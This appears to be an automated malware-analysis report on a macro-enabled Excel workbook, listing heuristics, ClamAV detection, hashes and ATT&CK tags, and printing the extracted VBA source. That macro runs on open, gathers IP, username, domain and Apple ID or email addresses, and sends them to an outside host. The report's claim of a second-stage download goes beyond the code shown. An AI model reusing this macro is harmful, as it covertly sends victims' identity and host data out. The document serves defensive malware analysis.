Verdict: MALICIOUS
Risk Score: 388

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
- T1059.003 Windows Command Shell
The sample contains a Workbook_Open macro, so its VBA code runs automatically when the workbook is opened. The code calls CreateObject("WScript.Shell") to run ipconfig.exe and collect host details (IP address, username, domain) that are assembled into a URL, which is then requested via Application.Workbooks.CanCheckOut in an attempt to download content. This indicates the macro is designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Malware.Valyria-10010011-0' further supports the malicious nature of the file.
Heuristics (8)

- ClamAV: Doc.Malware.Valyria-10010011-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-10010011-0
- VBA project inside OOXML (medium, OOXML_VBA, 6 related findings): Document contains a VBA project — VBA macros present
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6916 bytes |

SHA-256: 7fa3270834048784376fbc951725e3a36920a64e99a234335df5e4f1f23ea005

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
#If Mac Then
ip = Module1.Mac_Get_IP
username = Module1.Mac_Get_Username
appid = Module1.Mac_Get_AppleID
request = Module1.Mangle_Request(appid, username, ip, "M")
#Else
ip = Module1.Windows_Get_IP
username = Module1.Windows_Get_Username
domain = Module1.Windows_Get_Domain
request = Module1.Mangle_Request(domain, username, ip, "W")
#End If
Module1.Trigger_Token (request)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Option Explicit
Public Const BASE = ".po8r0baj1qezy5k4ybp2ge9pp.cbcb29a6623a.o3n.io..................................................................................................."
Public Const EOS = "..."
Public Function Trigger_Token(request As String)
On Error GoTo Err_Trigger
Application.Workbooks.CanCheckOut ("http://" & request)
Err_Trigger:
Exit Function
End Function
Public Function Mac_Get_IP() As String
On Error GoTo Err_IP
Dim RetVal As String
Dim IPAddress() As String
Dim Length As Integer
Dim script As String
script = "do shell script ""ifconfig"""
RetVal = MacScript(script)
IPAddress = Split(Split(RetVal, "status: active")(0), "inet")
Length = UBound(IPAddress) - LBound(IPAddress) + 1
Mac_Get_IP = Split(Trim(IPAddress(Length - 1)), " ")(0)
Exit_IP:
Exit Function
Err_IP:
Mac_Get_IP = "none"
Resume Exit_IP
End Function
Public Function Mac_Get_AppleID() As String
On Error GoTo Err_AppleID
Dim RetVal As String
Dim script As String
#If MAC_OFFICE_VERSION >= 15 Then
Dim User As String
Dim Email As String
Dim EmailArr() As String
Dim Length As Integer
User = MacScript("do shell script ""id -un"" ")
script = "do shell script ""dscl . -read /Users/" & User & " RecordName"""
RetVal = MacScript(script)
EmailArr = Split(RetVal, " ")
Length = UBound(EmailArr) - LBound(EmailArr) + 1
Dim i As Integer
For i = 0 To Length - 1
If EmailArr(i) Like "*@*" Then
RetVal = EmailArr(i)
Exit For
End If
Next i
#Else
script = "tell application " & Chr(34) & "Mail" & Chr(34) & _
" to get email addresses of every account"
RetVal = MacScript(script)
#End If
Mac_Get_AppleID = Trim(RetVal)
Exit_AppleID:
Exit Function
Err_AppleID:
Mac_Get_AppleID = "none"
Resume Exit_AppleID
End Function
Public Function Mac_Get_Username() As String
On Error GoTo Err_Username
Dim sUsername As String
sUsername = Environ$("USER")
Mac_Get_Username = sUsername
Exit_Username:
Exit Function
Err_Username:
Mac_Get_Username = "none"
Resume Exit_Username
End Function
Public Function Windows_Get_IP() As String
On Error GoTo Err_IP
Dim WshShell As Object
Dim oExec As Object
Dim sOutput As String
Dim sArr() As String
Set WshShell = VBA.CreateObject("WScript.Shell")
Set oExec = WshShell.exec("ipconfig.exe")
oExec.StdIn.Write "/a"
sOutput = oExec.StdOut.ReadAll()
sArr = Split(Split(Split(sOutput, "IPv4 Address")(1), ":")(1), " ")
Windows_Get_IP = Replace(Replace(Trim(sArr(1)), Chr(10), ""), Chr(13), "")
Exit_IP:
Exit Function
Err_IP:
Windows_Get_IP = "none"
Resume Exit_IP
End Function
Public Function Windows_Get_Username() As String
On Error GoTo Err_Username
Dim s
... (truncated)

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 23552 bytes |

SHA-256: 76720a0a520058ae15dcb847a9c55ee1dfe18a934cda96cb3baec0ba2ac38baf
Detection:
- ClamAV: Doc.Malware.Valyria-10010011-0
- Obfuscation or payload: unlikely